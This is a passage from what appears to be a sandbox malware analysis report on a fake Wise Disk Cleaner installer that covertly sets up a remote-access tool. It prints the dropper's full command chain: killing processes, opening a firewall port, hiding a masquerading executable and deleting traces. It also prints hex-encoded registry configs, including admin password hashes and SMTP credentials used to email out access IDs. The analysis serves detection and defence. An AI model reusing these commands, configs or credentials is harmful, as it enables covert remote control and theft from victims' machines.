72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\drivers\install.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe
"C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 5650 "Open Port 5650"
C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp" /SL5="$201A8,3793825,188928,C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe" /VERYSILENT /LANG=ru /TASKS=desktopicon
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
"C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe" /VERYSILENT /LANG=ru /TASKS=desktopicon
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e74727565